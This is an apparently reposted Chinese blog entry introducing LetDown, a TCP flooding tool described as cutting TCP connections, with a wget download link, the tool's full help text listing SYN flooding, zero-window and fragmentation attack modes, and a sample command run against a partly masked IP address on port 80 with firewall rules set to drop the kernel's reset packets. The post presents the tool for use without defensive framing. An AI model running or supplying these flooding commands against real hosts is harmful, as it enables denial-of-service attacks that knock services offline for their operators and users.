博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
letdown
阅读量:6954 次
发布时间:2019-06-27

本文共 1529 字,大约阅读时间需要 5 分钟。

hot3.png

一个切断 TCP 连接的东西  和它的名字一样

wget http://sourceforge.net/projects/complemento/files/latest/download?source=files

[root Dialog]# letdown

LetDown 3wh+payload flooder v0.7.7.2 - Acri Emanuele (crossbower@gmail.com)
Usage:
  letdown -d dst_ip -p dst_port -D dst_mac  [options]
Options:
  -d    destination ip address, target
  -D    destination mac address or router mac address
  -p    destination port
  -s    source ip address
  -S    source mac address
  -x    first source port (default 1025)
  -y    last source port (default 65534)
  -l    enables infinite loop mode
  -i    network interface
  -t    sleep time in microseconds (default 10000)
  -a    max time in second for waiting responses
Extra options:
  -v    verbosity level (0=quiet, 1=normal, 2=verbose)
  -f    automagically set firewall rules for blocking
        rst packet generated by the kernel
        examples: -f iptables, -f blackhole (for freebsd)
  -L    special interaction levels with the target
        s  syn flooding, no 3-way-handshake
        a  send acknowledgment packets (polite mode)
        f  send finalize packets (include polite mode)
        r  send reset packets (check firewall rules...)
  -W    window size for ack packets (ex: 0-window attack)
  -O    enable ack fragmentation and set fragment offset delta
  -C    fragment counter if fragmentation is enabled (default 1)
  -P    payload file (see payloads directory...)
  -M    multistage payload file (see payloads directory...)
简单的使用

[root letdown]# ./letdown -d  59.69.xx.xx -p 80 -i eth0 -D 14:DA:E9:C8:05:6A -f iptables

LetDown start: Mon May 13 23:03:41 2013
^Ckilling child processes...

转载于:https://my.oschina.net/sincoder/blog/130244

你可能感兴趣的文章
DNS: Intro & Basics
查看>>
常州day1p3
查看>>
训练记录
查看>>
20165306 Exp5 MSF基础应用
查看>>
字串乱序 PHP&JS
查看>>
[转] gdb的基本工作原理
查看>>
可视化iOS应用程序开发的6个Xcode小技巧
查看>>
button设置边宽和圆角
查看>>
jsp初学总结
查看>>
Spring MVC的视图解析器
查看>>
[09-07]点击按钮变跟页面展示内容
查看>>
Adreno GPU Profiler
查看>>
Eclipse搭建SpringBoot之HelloWorld
查看>>
作用域
查看>>
疯狂的ASP.NET系列-第一篇:啥是ASP.NET后续
查看>>
【.Net底层剖析】3.用IL来理解属性
查看>>
UVA - 1428 Ping pong
查看>>
P2495 [SDOI2011]消耗战
查看>>
P2633 Count on a tree
查看>>
重读<软件性能测试>摘要
查看>>